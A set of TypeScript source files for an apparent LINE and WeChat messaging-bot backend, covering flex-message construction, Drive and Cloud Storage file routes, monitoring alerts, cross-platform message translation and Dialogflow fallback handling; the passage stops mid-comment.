/** Reply-button sets keyed by message-template code (previously a ~300-line duplicated switch). */
const REPLY_OPTIONS: { [type: string]: ReplyOption[] } = {
    "11D": [
        { label: "登記", action: 1 },
        { label: "預排上課時間", action: 2, datetime: true },
        { label: "延期", action: 3, displayText: "暫無法排定,未來會主動通知上課時間" }
    ],
    "14D": [
        { label: "登記", action: 1 },
        { label: "預排上課時間", action: 2, datetime: true },
        { label: "延期", action: 3, displayText: "暫無法排定,未來會主動通知上課時間" }
    ],
    "21S": [
        { label: "參加", action: 1 },
        { label: "不克前往", action: 2 }
    ],
    "23S": [
        { label: "a : 台北交通車", action: 1 },
        { label: "b : 台中交通車", action: 2 },
        { label: "c : 高鐵到新竹", action: 3 },
        { label: "d : 自行前往", action: 4 },
        { label: "e : 課前一天接機", action: 5 }
    ],
    "32S": [
        { label: "a : 台北", action: 1 },
        { label: "b : 台中", action: 2 },
        { label: "c : 南區", action: 3 },
        { label: "d : 自行前往", action: 4 },
        { label: "e : 接機", action: 5 }
    ],
    "33S": [
        { label: "抽菸", action: 1 },
        { label: "打鼾", action: 2 },
        { label: "素食", action: 3 }
    ],
    "41S": [
        { label: "參加", action: 1 },
        { label: "不克前往", action: 2 }
    ],
    "42S": [
        { label: "參加", action: 1 },
        { label: "不克前往", action: 2 }
    ]
}

/** Flex buttons (plus a trailing separator) for a template code; [] for unknown codes. */
const optionButtons = (type: string): FlexComponent[] => {
    const options = REPLY_OPTIONS[type]
    if (!options) return []
    const buttons: FlexComponent[] = options.map((opt): FlexComponent => ({
        type: "button",
        action: opt.datetime
            ? {
                type: "datetimepicker",
                label: opt.label,
                data: `type=${type}&action=${opt.action}`,
                mode: "date"
            }
            : {
                type: "postback",
                label: opt.label,
                displayText: opt.displayText || opt.label,
                data: `type=${type}&action=${opt.action}`
            }
    }))
    buttons.push({ type: "separator", margin: "md" })
    return buttons
}

// Extensions routed to an online viewer vs. sent as LINE image messages.
const OFFICE_EXTENSIONS = ["pptx", "ppt", "docx", "doc", "xlsx", "xls"]
const IMAGE_EXTENSIONS = ["jpg", "jpeg", "png"]

/** Wrap office/pdf files in an online viewer so LINE can open them inline. */
const toViewerUrl = (url: string, extension: string): string => {
    if (OFFICE_EXTENSIONS.indexOf(extension) >= 0)
        return "https://view.officeapps.live.com/op/embed.aspx?src=" + url
    if (extension == "pdf")
        return "https://docs.google.com/viewerng/viewer?url=" + url
    return url
}

/** A tappable flex row showing the file name next to a file icon. */
const fileRow = (name: string, viewerUrl: string): FlexComponent => ({
    type: "box",
    layout: "horizontal",
    action: {
        type: "uri",
        label: "檢視",
        uri: `${viewerUrl}`
    },
    contents: [
        {
            type: "text",
            size: "sm",
            text: name,
            gravity: "center",
            weight: "bold",
            flex: 3
        },
        {
            type: "image",
            url: "https://ezzeng.ddns.net/icon5/file.png",
            align: "start",
            margin: "sm",
            size: "xxs"
        }
    ]
})

/**
 * Build the LINE messages sent to a single person: one flex "bubble"
 * carrying the sender banner, optional text, link button, file rows and
 * reply buttons, followed by any image attachments as separate image
 * messages.
 *
 * @param sender      member whose name (and optional path) heads the bubble
 * @param message     free text; the first URL found in it is stripped and
 *                    rendered as a "前往連結" button instead
 * @param storageUrls attached files; office/pdf get a viewer link row,
 *                    jpg/jpeg/png become standalone image messages
 * @param thumb       optional hero image URL for the bubble
 * @param type        template code selecting a reply-button set
 * @returns the message array, or null when the bubble body would be empty
 */
export const toPersonMessage = (sender: Member, message?: string, storageUrls?: MessageTemplate["urls"], thumb?: string, type?: string): Message | Message[] | null => {
    const contents: FlexComponent[] = []
    const imageMessages: Message[] = []
    // Pull the first URL out of the text; it becomes a dedicated button below.
    const urls = getURLfromString(message)
    if (urls) {
        message = message.replace(urls[0], "")
    }
    const flexMessage: Message = {
        type: "flex",
        altText: `《來自${sender.name}》${sender.path ? `\n${sender.path}` : ""}`,
        contents: {
            type: "bubble",
            header: {
                type: "box",
                layout: "vertical",
                contents: [
                    {
                        type: "text",
                        text: `《來自${sender.name}》`,
                        weight: "bold",
                        size: "xl",
                        align: "center"
                    }
                ]
            },
            body: {
                type: "box",
                layout: "vertical",
                contents: contents
            }
        }
    }
    if (thumb && thumb != "" && flexMessage.contents.type == "bubble") {
        flexMessage.contents.hero = {
            type: "image",
            url: encodeURI(decodeURI(thumb)),
            size: "full",
            aspectRatio: "20:13",
            aspectMode: "cover"
        }
    }
    if (message && message != "") {
        contents.push(
            {
                type: "box",
                layout: "vertical",
                contents: [
                    { type: "separator" },
                    {
                        type: "text",
                        text: message,
                        size: "md",
                        margin: "md",
                        wrap: true
                    }
                ]
            },
            { type: "separator", margin: "md" }
        )
        if (urls && urls.length > 0) {
            contents.push(
                {
                    type: "button",
                    action: {
                        type: "uri",
                        uri: urls[0],
                        label: "前往連結"
                    }
                },
                { type: "separator", margin: "md" }
            )
        }
    }
    if (storageUrls) {
        for (const storageUrl of storageUrls) {
            const fileUrl = encodeURI(decodeURI(storageUrl.url))
            const extension = fileUrl.substring(fileUrl.lastIndexOf(".") + 1, fileUrl.length).toLowerCase()
            if (IMAGE_EXTENSIONS.indexOf(extension) >= 0) {
                // Images go out as separate LINE image messages, not bubble rows.
                console.log("viewerUrl:", fileUrl)
                imageMessages.push({
                    type: "image",
                    originalContentUrl: fileUrl,
                    previewImageUrl: fileUrl
                })
            } else {
                contents.push(
                    fileRow(storageUrl.name, toViewerUrl(fileUrl, extension)),
                    { type: "separator", margin: "md" }
                )
            }
        }
    }
    if (type) {
        contents.push(...optionButtons(type))
    }
    if (sender.path && flexMessage.contents.type == "bubble" && flexMessage.contents.header) {
        flexMessage.contents.header.contents.push({
            type: "text",
            text: sender.path,
            weight: "bold",
            size: "sm",
            margin: "md"
        })
    }
    // NOTE(review): when ONLY images are attached, `contents` stays empty and
    // the images are dropped along with the null return (matches the original
    // behavior) — confirm this is intended.
    return contents.length > 0 ? [flexMessage, ...imageMessages] : null
}
/**
* receiver為群組
* @param sender
* @param message
* @param files
*/
// export const toGroupMessage = (sender: Member, message?: string, files?: File[]): Message => {
// if (message && !files) {
// const textMessage: Message = {
// type: "text",
// text: `《來自${sender.name}》\n${sender.path}\n${message}`
// }
// return textMessage
// }
// if (files)
// return toPersonMessage(sender, message, files)
// return null
// }
const getURLfromString = (message: string): string[] => {
const regex = new RegExp(/[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi)
return regex.exec(message)
}<file_sep>/src/fileWS.ts
import { Router } from "express"
import * as driveService from './services/driveService';
import * as config from './config';
import { google } from "googleapis"
import axios from 'axios'
import { Stream } from 'stream';
let fs = require('fs');
import * as mime from "mime"
import * as admin from 'firebase-admin';
const router = Router()
// Stream a Google Drive file to the client as an attachment.
// The file's metadata (name/mimeType) is read from Firestore, then the
// binary content is fetched from the Drive API and piped to the response.
router.get('/getFile', async function (req, res) {
    const auth = await driveService.authorize()
    // NOTE(review): `drive` is created but never used below — confirm it
    // can be removed.
    const drive = google.drive({ version: 'v3', auth });
    const fileId = req.query.fileId;
    driveService.getFileById(fileId).then(async doc => {
        if (doc.exists) {
            let file = doc.data()
            // res.contentType("arraybuffer")
            res.setHeader('content-type', 'arraybuffer');
            // Attachment filename is rebuilt from stored name + mime type.
            res.setHeader("Content-Disposition", "attachment; filename=" + encodeURI(file.name) + "." + mime.getExtension(file.mimeType))
            // res.setHeader("Content-Type", "arraybuffer; title=" + encodeURI(file.name))
            console.log(JSON.stringify(file, null, 2))
            // Drive's alt=media endpoint needs a fresh OAuth access token.
            const token = await auth.refreshAccessToken()
            const result = await axios.get(`https://www.googleapis.com/drive/v3/files/${fileId}?alt=media`, {
                responseType: "stream",
                headers: {
                    "Authorization": "Bearer " + token.credentials.access_token,
                }
            })
            const stream = result.data as Stream
            stream.pipe(res) // pipe the Drive download stream straight into the response
                .on('finish', function () {
                    console.log('Sending done.');
                });
        } else {
            // Unknown file id: no metadata document found.
            res.sendStatus(403)
        }
    })
});
// Accept a base64-encoded file in the request body and upload it to the
// default Cloud Storage bucket under <path>/<timestamp>/<filename>.
// Responds 200 with the public URL, 403 when the mime type is unknown,
// 500 when the upload stream fails.
router.post('/uploadFileToStorage', async function (req, res) {
    console.log("uploadFile");
    const filename = req.body.filename
    // Optional sub-folder prefix, e.g. "temp" -> "temp/".
    let path = ""
    console.log("req.headers:", filename + " " + path);
    if (req.body.hasOwnProperty("path")) {
        path = req.body.path + "/"
    }
    // Timestamp folder keeps concurrent uploads of the same filename apart.
    const now = +Date.now()
    // Previously the path used the literal "$(unknown)" — looks like a lost
    // `${filename}` interpolation; restored here.
    const destination = `${path}${now}/${filename}`
    // Body carries the file as a data-URI style base64 string.
    const base64Image = req.body.file.split(';base64,').pop();
    const bufferStream = new Stream.PassThrough();
    // Buffer.from replaces the deprecated new Buffer() constructor.
    bufferStream.end(Buffer.from(base64Image, 'base64'));
    const bucket = admin.storage().bucket();
    const file = bucket.file(destination, {});
    // Content type is inferred from the filename extension.
    const newType = mime.getType(filename.substring(filename.lastIndexOf(".") + 1, filename.length))
    if (newType && newType != null) {
        bufferStream.pipe(file.createWriteStream({
            metadata: {
                contentType: newType.toString()
            },
            validation: "md5"
        }))
            .on('error', function (err) {
                // Surface upload failures instead of silently dropping them
                // (the request would otherwise hang with no response).
                console.log(`upload of ${destination} failed:`, err)
                res.sendStatus(500)
            })
            .on('finish', function () {
                console.log(`${newType} ${destination} uploaded to bucket.`);
                res.status(200).send({ url: `https://storage.googleapis.com/${config.storageBucket}/${destination}` })
            });
    } else {
        console.log(`${destination} cannot be uploaded to bucket.`);
        res.sendStatus(403)
    }
});
// Garbage-collect the "temp/" prefix in the bucket: every timestamp
// folder older than one week is deleted. The response is sent only after
// all deletions have settled (previously the deletes were fired and
// forgotten, so the 200 could precede — or mask — failures).
router.post('/deleteFileFromStorage', async function (req, res) {
    console.log("deleteFile");
    const path = "temp/"
    const now = +Date.now()
    const WEEK_MS = 604800000 // 7 days in milliseconds
    const bucket = admin.storage().bucket();
    const [fileObjs] = await bucket.getFiles({ prefix: path })
    const deletions: Promise<any>[] = []
    for (const fileObj of fileObjs) {
        console.log("fileObj.name:", fileObj.name)
        // Object names look like "temp/<timestamp>/<filename>"; the
        // timestamp folder decides the file's age.
        const subObjName = fileObj.name.replace(path, "")
        const stampNum = parseInt(subObjName.substring(0, subObjName.indexOf("/")), 10)
        console.log("subObjName:", stampNum)
        if ((now - stampNum) > WEEK_MS) {
            const fileToDelete = path + subObjName.substring(0, subObjName.indexOf("/")) + "/"
            console.log("Older than a week!", fileToDelete)
            console.log("Expired:", (now - stampNum))
            deletions.push(
                bucket.deleteFiles({ prefix: fileToDelete })
                    .then(result => {
                        console.log("deleted", result)
                    })
                    .catch(() => {
                        // Keep sweeping the remaining folders on failure.
                        console.log("ERROR")
                    })
            )
        } else {
            console.log("Newer than a week!")
        }
    }
    await Promise.all(deletions)
    res.status(200).send("files deleted")
});
// module.exports = router;
export default router
// router.get('/getFileFromLocal', bodyParser.json(), async function (req, res) {
// const fileId = req.query.fileId;
// driveService.getFileById(fileId).then(async doc => {
// if (doc.exists) {
// let file = doc.data()
// let basePath = "C:\\driveFiles\\Files\\"
// let extPath = ""
// res.setHeader('content-type', 'arraybuffer');
// res.setHeader("Content-Disposition", "attachment; filename=" + encodeURI(file.name) + "." + mime.getExtension(file.mimeType))
// console.log(JSON.stringify(file, null, 2))
// for (let i = 1; i < file.parentsName.length; i++) {
// extPath += file.parentsName[i].fullName + "\\"
// }
// console.log("basePath+extPath:", basePath + extPath + file.fullName)
// const stream = fs.createReadStream(basePath + extPath + file.fullName)
// stream.pipe(res) // <-- 將數據來源變成 ReadableStream
// .on('finish', function () {
// console.log('Sending done.');
// });
// } else {
// res.sendStatus(403)
// }
// })
// });<file_sep>/src/healthReport.ts
import { Router } from "express"
import * as Line from "@line/bot-sdk"
import * as config from "./config"
// import * as Moment from "moment"
import * as Moment from "moment-timezone"
const groupId = config.healthReportGroupId
const lineClient = new Line.Client(config.LINE)
const router = Router()
// Stackdriver/Cloud Monitoring webhook: translate an incident payload
// into a LINE alert pushed to the monitoring group.
router.post("/healthReport", async (req, res) => {
    const event = req.body
    const serviceName = event.incident.policy_name
    const serviceState = event.incident.state == "closed" ? "正常" : "異常"
    // started_at is a unix timestamp in seconds; shift +8h for Taiwan time.
    // NOTE(review): moment-timezone is imported but .tz() is unused — this
    // double-offsets unless the host clock is UTC; confirm.
    let eventTime = new Date(event.incident.started_at * 1000)
    eventTime.setHours(eventTime.getHours() + 8)
    const time = Moment(eventTime)
    console.log(JSON.stringify(event, null, 4))
    try {
        // Await so delivery failures are logged instead of becoming
        // unhandled promise rejections (previously fire-and-forget).
        // NOTE(review): "hh" is 12-hour without AM/PM; "HH" may be intended.
        await lineClient.pushMessage(groupId, {
            type: "text",
            text: "系統警示\n"
                + `${time.format("YYYY-MM-DD hh:mm:ss")}\n\n`
                + `服務名稱:${serviceName}\n`
                + `服務狀態:${serviceState}`
        })
    } catch (err) {
        console.log("healthReport push failed:", err)
    }
    res.sendStatus(200)
})
// Manual smoke-test endpoint: push a fixed "Dialogflow OK" alert to the
// monitoring group.
router.get("/report", async (req, res) => {
    let eventTime = new Date()
    const time = Moment(eventTime)
    try {
        // Await so delivery failures are logged instead of becoming
        // unhandled promise rejections (previously fire-and-forget).
        await lineClient.pushMessage(groupId, {
            type: "text",
            text: "系統警示\n"
                + `${time.format("YYYY-MM-DD hh:mm:ss")}\n\n`
                + `服務名稱:Dialogflow\n`
                + `服務狀態:正常`
        })
    } catch (err) {
        console.log("report push failed:", err)
    }
    res.sendStatus(200)
})
export default router<file_sep>/src/services/chatbotService.ts
import * as Line from '@line/bot-sdk';
import * as config from '../config';
import * as memberService from './memberService';
import * as NodeCache from "node-cache"
import * as axios from 'axios'
import * as Moment from "moment-timezone"
const chatbotCache = new NodeCache({ stdTTL: 600, checkperiod: 0 });
// const express = require('express');
const lineBot = new Line.Client(config.LINE);
/**
 * Mirror an outgoing message to the monitor group, prefixed with a line
 * identifying the recipient (resolved against the Member collection when
 * possible). Any lookup/push error is itself reported to the group.
 */
const monitorResponseMessage = async (lineId: string, message: any): Promise<any> => {
    const userId = lineId == null ? "User from Web without login" : lineId
    const outbox: any[] = []
    try {
        const receiver = await memberService.getMemberByAnyId(userId)
        if (receiver.empty) {
            outbox.push({ type: "text", text: `Response to: ${userId} [未綁定]` })
        } else {
            const user = receiver.docs[0].data()
            outbox.push({ type: "text", text: `Response to: ${userId} \n[${user.businessName} ${user.name} ${user.title}]` })
        }
        if (Array.isArray(message)) {
            outbox.push(...message)
        } else {
            outbox.push(message)
        }
        return lineBot.pushMessage(config.monitorGroupId, outbox)
    } catch (error) {
        outbox.push({ type: "text", text: `Response to: ${userId} getSales Error: ${error}` })
        return lineBot.pushMessage(config.monitorGroupId, outbox)
    }
}
// Send one custom message through the WeChat API, reusing a cached access
// token when available and fetching + caching a fresh one (TTL 7000s,
// tokens expire in 7200s) otherwise.
// NOTE(review): non-zero errcode responses and axios errors resolve or
// leave the promise pending without rejecting — confirm callers do not
// rely on failure signalling.
const wechatSend = (messageToSend) => {
    return new Promise((resolve, reject) => {
        chatbotCache.get("wechatAccessToken", (err, value) => {
            if (!err && value) {
                console.log("GetWechatToken: ", value)
                const accessToken = value;
                const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=${accessToken}`;
                axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
                    console.log("response.data:", response.data)
                    if (response.data.errcode != 0) {
                    }
                    console.log("Send Success")
                    resolve("Send Success")
                }).catch(error => console.log(error));
            } else {
                // Cache miss: exchange app id/secret for a new access token.
                const getAccessTokenUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${config.wechatAccount.id}&secret=${config.wechatAccount.secret}`;
                axios.default.get(getAccessTokenUrl).then(res => {
                    const accessToken = res.data.access_token;
                    console.log("token:",accessToken)
                    const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=${accessToken}`;
                    chatbotCache.set("wechatAccessToken", accessToken, 7000);
                    axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
                        console.log("response.data:", response.data)
                        if (response.data.errcode != 0) {
                        }
                        resolve("Send Success")
                    }).catch(error => console.log(error));
                }).catch(error => console.log(error));
            }
        });
    })
}
/**
 * Push a message to a user on whichever platform their id belongs to:
 * LINE-length ids go straight to the LINE SDK; everything else is
 * translated message-by-message into the WeChat custom-message format
 * and sent sequentially through wechatSend. Non-monitor messages are
 * also mirrored to the monitor group.
 */
export const pushMessage = async (platformId, platformMessage) => {
    // console.log("platformMessage:", JSON.stringify(platformMessage, null, 2))
    if (platformId != config.monitorGroupId && platformMessage.hasOwnProperty("type")) {
        // Fire-and-forget mirror to the monitor group (deliberately not awaited).
        monitorResponseMessage(platformId, platformMessage)
    }
    if (platformId.length == config.idLength.LINE) {
        return lineBot.pushMessage(platformId, platformMessage);
    } else {
        let messageToSend = {}
        let messageArray = []
        // Normalise to an array so single messages and batches share one path.
        if (platformMessage.constructor === Array) {
            messageArray = platformMessage
        } else {
            messageArray.push(platformMessage)
        }
        for (let i = 0; i < messageArray.length; i++) {
            if (messageArray[i].hasOwnProperty("type")) {
                // Translate each LINE-style message into its WeChat equivalent.
                // NOTE(review): the image/audio/video branches (and the
                // non-WeChat location branch) build objects without
                // touser/msgtype — confirm wechatSend accepts these shapes.
                switch (messageArray[i].type) {
                    case "text":
                        messageToSend = {
                            touser: platformId,
                            msgtype: "text",
                            text: { content: messageArray[i].text }
                        };
                        break;
                    case "location":
                        messageToSend = {
                            type: "location",
                            location: {
                                title: messageArray[i].title,
                                address: messageArray[i].address,
                                latitude: messageArray[i].latitude,
                                longitude: messageArray[i].longitude
                            }
                        };
                        if (platformId.length == config.idLength.WECHAT) {
                            // WeChat has no location push; degrade to text.
                            messageToSend = {
                                touser: platformId,
                                msgtype: "text",
                                text: {
                                    content: `${messageArray[i].title}\n${messageArray[i].address}`
                                }
                            };
                        }
                        break;
                    case "image":
                        messageToSend = {
                            type: "image",
                            image: messageArray[i].originalContentUrl
                        };
                        break;
                    case "audio":
                        messageToSend = {
                            type: "audio",
                            audio: {
                                audioUrl: messageArray[i].originalContentUrl,
                                duration: messageArray[i].duration
                            }
                        };
                        break;
                    case "video":
                        messageToSend = {
                            type: "video",
                            video: {
                                title: "<Video title>",
                                description: "<Video description>",
                                previewImage: messageArray[i].previewImageUrl,
                                videoUrl: messageArray[i].originalContentUrl
                            }
                        };
                        break;
                    case "template":
                        // LINE confirm/buttons/carousel templates become WeChat
                        // "news" articles, one article per action/column.
                        let columnsOptions = [];
                        if (platformId.length == config.idLength.WECHAT) {
                            if (messageArray[i].template.type == "confirm") {
                                columnsOptions.push({
                                    title: messageArray[i].template.text + "\n" + messageArray[i].template.actions[0].label,
                                    description: messageArray[i].template.text,
                                    url: messageArray[i].template.actions[0].uri,
                                });
                                for (let k = 1; k < messageArray[i].template.actions.length; k++) {
                                    columnsOptions.push({
                                        title: messageArray[i].template.actions[k].label,
                                        description: messageArray[i].template.text,
                                        url: messageArray[i].template.actions[k].uri,
                                    });
                                }
                                messageToSend = {
                                    touser: platformId,
                                    msgtype: "news",
                                    news: {
                                        articles: columnsOptions
                                    }
                                };
                            }
                            if (messageArray[i].template.type == "buttons") {
                                for (let k = 0; k < messageArray[i].template.actions.length; k++) {
                                    columnsOptions.push({
                                        title: messageArray[i].template.actions[k].label,
                                        description: messageArray[i].template.text,
                                        url: messageArray[i].template.actions[k].uri,
                                    });
                                }
                                messageToSend = {
                                    touser: platformId,
                                    msgtype: "news",
                                    news: {
                                        articles: columnsOptions
                                    }
                                };
                            }
                            if (messageArray[i].template.type == "carousel") {
                                for (let k = 0; k < messageArray[i].template.columns.length; k++) {
                                    columnsOptions.push({
                                        title: messageArray[i].template.columns[k].text,
                                        description: messageArray[i].template.columns[k].text,
                                        url: ``,
                                    });
                                }
                                messageToSend = {
                                    touser: platformId,
                                    msgtype: "news",
                                    news: {
                                        articles: columnsOptions
                                    }
                                }
                            }
                        }
                        break;
                    case "imagemap":
                        // Imagemap tap areas become news articles linking out.
                        let actionsOptions = [];
                        for (let k = 0; k < messageArray[i].actions.length; k++) {
                            actionsOptions.push({
                                title: messageArray[i].altText,
                                description: messageArray[i].altText,
                                url: messageArray[i].actions[k].linkUri,
                            });
                        }
                        messageToSend = {
                            touser: platformId,
                            msgtype: "news",
                            news: {
                                articles: actionsOptions
                            }
                        }
                        break;
                }
            } else {
                // Already in WeChat format: just address it and pass through.
                messageArray[i].touser = platformId
                messageToSend = messageArray[i]
            }
            console.log(JSON.stringify(messageToSend));
            await wechatSend(messageToSend)
        }
    }
};
/**
 * Push WeChat *template* messages built from "news"-style payloads.
 * Article 0 supplies the keyword fields shown in the template; each
 * subsequent article (j >= 1) produces one template message whose
 * "詳情" link is that article's url.
 * NOTE(review): messages whose news payload has a single article send
 * nothing (loop starts at j = 1) — confirm this is intended.
 */
export const pushWechatTemplateMessage = async (platformId, platformMessage) => {
    console.log("platformMessage:", JSON.stringify(platformMessage, null, 2))
    if (platformId != config.monitorGroupId && platformMessage.hasOwnProperty("type")) {
        monitorResponseMessage(platformId, platformMessage)
    }
    let messageToSend = {}
    let messageArray = []
    let eventTime = new Date()
    eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
    const time = Moment(eventTime)
    // Normalise to an array so single messages and batches share one path.
    if (platformMessage.constructor === Array) {
        messageArray = platformMessage
    } else {
        messageArray.push(platformMessage)
    }
    for (let i = 0; i < messageArray.length; i++) {
        messageArray[i].touser = platformId
        messageArray[i].template_id = config.generalTemplateId
        for (let j = 1; j < messageArray[i].news.articles.length; j++) {
            messageArray[i].url = messageArray[i].news.articles[j].url
            messageArray[i].data = {}
            messageArray[i].data["first"] = {
                value: "",
                color: "#173177"
            }
            messageArray[i].data["keyword1"] = {
                value: messageArray[i].news.articles[0].title,
                color: "#173177"
            }
            messageArray[i].data["keyword2"] = {
                value: messageArray[i].news.articles[0].description,
                color: "#173177"
            }
            messageArray[i].data["keyword3"] = {
                value: `${time.format("YYYY-MM-DD hh:mm:ss")}`,
                color: "#173177"
            }
            messageArray[i].data["remark"] = {
                value: `請點選「詳情」${messageArray[i].news.articles[j].description}`,
                color: "#173177"
            }
            messageToSend = messageArray[i]
            console.log(JSON.stringify(messageToSend));
            await wechatTemplateSend(messageToSend)
        }
    }
};
// Send one template message through the WeChat API, reusing the cached
// access token when available and fetching + caching a fresh one
// (TTL 7000s) otherwise. Same token handling as wechatSend.
// NOTE(review): errors resolve or leave the promise pending without
// rejecting — confirm callers do not rely on failure signalling.
export const wechatTemplateSend = async (messageToSend) => {
    return new Promise((resolve, reject) => {
        chatbotCache.get("wechatAccessToken", (err, value) => {
            if (!err && value) {
                console.log("GetWechatToken: ", value)
                const accessToken = value;
                const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=${accessToken}`;
                axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
                    console.log("response.data:", response.data)
                    if (response.data.errcode != 0) {
                    }
                    console.log("Send Success")
                    resolve("Send Success")
                }).catch(error => console.log(error));
            } else {
                // Cache miss: exchange app id/secret for a new access token.
                const getAccessTokenUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${config.wechatAccount.id}&secret=${config.wechatAccount.secret}`;
                axios.default.get(getAccessTokenUrl).then(res => {
                    const accessToken = res.data.access_token;
                    const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=${accessToken}`;
                    chatbotCache.set("wechatAccessToken", accessToken, 7000);
                    axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
                        console.log("response.data:", response.data)
                        if (response.data.errcode != 0) {
                        }
                        resolve("Send Success")
                    }).catch(error => console.log(error));
                }).catch(error => console.log(error));
            }
        });
    })
}
// Thin wrapper around the LINE SDK: answer an incoming event via its reply token.
export const replyMessage = (replyToken, lineMessage) => lineBot.replyMessage(replyToken, lineMessage);
import { jsonToStructProto, structProtoToJson } from './structjson'
import * as responseConfig from './responseConfig'
import * as config from './config'
import * as memberService from "./services/memberService"
import * as lineServices from "./services/lineService"
import { pushMessage } from './services/chatbotService'
import { ChatMessage, Member, RecordDetail, MessageTemplate } from './model';
import * as chatMessageService from './services/chatMessageService'
/**
 * Prompts an unregistered user to log in. LINE and WeChat ids are told
 * apart by their fixed lengths and routed to the matching login endpoint.
 */
const userRegistration = (lineId: string): Promise<any> => {
    const isWechat = lineId.length == config.idLength.WECHAT
    const uri = isWechat
        ? config.uriName + "wechatLogin?target=loginWechat"
        : config.uriName + "lineLogin?target=login"
    const message = {
        type: "template",
        altText: `歡迎使用《${config.appName}》`,
        template: {
            type: "buttons",
            title: `歡迎使用《${config.appName}》`,
            text: `請點選<登入>,經身份認證後,授權您使用《${config.appName}》`,
            actions: [
                {
                    type: "uri",
                    label: "登入",
                    uri: uri
                }
            ]
        }
    }
    return pushMessage(lineId, message)
}
// First no-match fallback: ask the user to repeat their last instruction.
const unMatchOnce = (lineId: string): Promise<any> =>
    pushMessage(lineId, { type: "text", text: "我不太了解您的指令,請再說一次" })
// Second no-match fallback: repeat the prompt and attach the main menu template.
const unMatchTwice = (lineId: string): Promise<any> => {
    const messages = [
        { type: "text", text: "我不太了解您的指令,請再說一次,或以下列主選單操作" },
        JSON.parse(responseConfig.mainMenu)
    ]
    return pushMessage(lineId, messages)
}
// Shown when the Dialogflow call itself failed.
const dialogFlowError = (lineId: string): Promise<any> =>
    pushMessage(lineId, { type: "text", text: "系統忙碌中,請稍後再試" })
/**
 * Resolves a "menu" intent: looks up the canned response template named by
 * the Dialogflow `instruction` parameter and pushes it to the user.
 * Resolves to undefined when no template with that name exists.
 */
const menuAction = async (lineId, dialogflowResult): Promise<any> => {
    const parameters = structProtoToJson(dialogflowResult.parameters)
    const template = responseConfig[parameters["instruction"]]
    if (template == undefined) {
        console.log("responseConfig[instruction] is undefined")
        return
    }
    // sendToBigQuery(lineId, userName, divsionName, `menu:${instruction}`)
    return pushMessage(lineId, JSON.parse(template))
}
/**
 * Default intent handler for unmatched/free-text utterances.
 *
 * When the user is a known member: marks their session "recent", records
 * the raw utterance as an inbound chat record addressed to "system", and
 * returns without replying. When the user is unknown: replies with a
 * canned "please repeat" prompt.
 *
 * @param userId - LINE or WeChat user id (channel inferred from id length)
 * @param dialogflowResult - Dialogflow query result for the utterance
 */
const dialogflowFulfillmentText = async (userId, dialogflowResult): Promise<any> => {
    // should set response from dialogflow
    let speech = ""
    let msg = {
        type: "text",
        text: ""
    }
    if (dialogflowResult.fulfillmentText != undefined) {
        // Dialogflow delivers newlines escaped as "\n"; restore literal newlines.
        speech = dialogflowResult.fulfillmentText.replace(/\\n/g, "\n");
    }
    let qText: string = dialogflowResult.queryText
    let memberSnapShot = await memberService.getMemberByAnyId(userId)
    if (!memberSnapShot.empty) {
        let memberData: Member = memberSnapShot.docs[0].data() as Member
        // if (receiverData.type == "member") {
        // Touch the member's session so they count as recently active.
        let memberUpdateData: Member = { ...memberData, session: "recent" }
        await memberService.setMember(memberUpdateData)
        let userMessage: ChatMessage = {
            id: userId
        }
        await chatMessageService.setChatMessage(userMessage)
        // Channel is inferred from the platform-specific id length.
        let channel = ""
        if (userId.length == config.idLength.LINE) {
            channel = "Line"
        } else if (userId.length == config.idLength.WECHAT) {
            channel = "WeChat"
        }
        const trackId = chatMessageService.getRecordDetailUUID(userMessage.id)
        // Persist the utterance as an inbound record addressed to "system";
        // newlines are re-escaped for storage.
        const recordDetail: RecordDetail = {
            id: trackId,
            receiver: { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 },
            channel: channel as MessageTemplate['channel'],
            message: qText.replace(/\n/g, "\\n"),
            isSucceed: true,
            receiveTime: new Date().getTime(),
            read: false
        }
        // const lineMessage = lineServices.toPersonMessage(memberSnapShot.docs[0].data() as Member, "system", `${userMessage.sender.name}留言通知\nhttps://messagingsystem-218402.firebaseapp.com/connect/${userId}`, [])
        // pushMessage("Uea40f2abaf004484ff382dcdaf1a3a94", lineMessage).catch(err => {
        //     console.log("err:", err)
        // })
        // const wechatMessages = toTemplateMessages(memberSnapShot.docs[0].data() as Member, "system", { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "ov3qV1fHPnVuEihyiKTVODNofGF4", role: "staff" }, `${userMessage.sender.name}留言通知\nhttps://messagingsystem-218402.firebaseapp.com/connect/${userId}`, [])
        // pushTemplateMessages(wechatMessages).catch(err => {
        //     console.log("err:", err)
        // })
        // if (qText == "參加") {
        //     msg.text = "學長您好!已收到您的回覆,謝謝您!"
        //     await pushMessage(userId, msg).then(success=>{
        //         chatMessageService.createChatMessage(recordDetail.receiver, memberSnapShot.docs[0].data() as Member, channel, msg.text, [], "")
        //     })
        // } else if (qText == "不克參加") {
        //     msg.text = "學長您好!謝謝您的回覆,期待下次您的參與!"
        //     await pushMessage(userId, msg).then(success=>{
        //         chatMessageService.createChatMessage(recordDetail.receiver, memberSnapShot.docs[0].data() as Member, channel, msg.text, [], "")
        //     })
        // }
        // Known member: store the record and exit without replying.
        return chatMessageService.setRecordDetail(userMessage.id, recordDetail)
        // }
    }
    // Unknown user: `speech` is currently unused by design (both branches of
    // the non-empty case are commented out), so the reply is always the
    // canned "please repeat" prompt.
    if (speech.length > 0) {
        // msg.text = speech
        // msg.text = "我不太了解您的指令,請再說一次"
    } else {
        msg.text = "我不太了解您的指令,請再說一次"
    }
    if (msg.text != "") {
        return pushMessage(userId, msg)
    } else {
        return Promise.resolve()
    }
}
/**
